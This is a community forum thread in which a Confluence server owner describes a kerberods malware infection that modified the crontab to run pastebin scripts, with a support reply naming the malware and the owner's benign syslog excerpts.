Hello! I have Confluence on my server ver. 6.8.
It was hacked somehow and somebody uses it to spam and flood from my server.
How is it possible? I have only atlassian (+nginx) and postgres on the server.
The malware is running as "confluence" user. They changed the crontab and run scripts from pastebin.com.
I agree with your diagnosis that you've been infected specifically with kerberods malware as linked in the other thread, based on the pastebin script that it pulled.
As described in the linked thread that you read, there's a two-step process needed to get this resolved:
Let me know if you have any questions about the upgrade!
Daniel | Atlassian Support
In syslog I see:
syslog.3.gz:Apr 12 14:10:21 vm-wiki-01 dbus: [system] Activating via systemd: service name='org.freedesktop.PolicyKit1' unit='polkitd.service'
syslog.3.gz:Apr 12 14:10:21 vm-wiki-01 systemd: Starting Authenticate and Authorize Users to Run Privileged Tasks...
syslog.3.gz:Apr 12 14:10:21 vm-wiki-01 polkitd: started daemon version 0.105 using authority implementation `local' version `0.105'
syslog.3.gz:Apr 12 14:10:21 vm-wiki-01 dbus: [system] Successfully activated service 'org.freedesktop.PolicyKit1'
syslog.3.gz:Apr 12 14:10:21 vm-wiki-01 systemd: Started Authenticate and Authorize Users to Run Privileged Tasks.
syslog.3.gz:Apr 12 14:10:23 vm-wiki-01 crontab: (confluence) REPLACE (confluence)
So I tried to disable polkitd.
Wherever you are in your team’s journey , our goal is to support your big ambitions. We’re a cloud-first company with the mission of unleashing the potential of every team, and to address the range ...
Connect with like-minded Atlassian users at free events near you!Find an event
Connect with like-minded Atlassian users at free events near you!
Unfortunately there are no Community Events near you at the moment.Host an event
You're one step closer to meeting fellow Atlassian users at your local event. Learn more about Community Events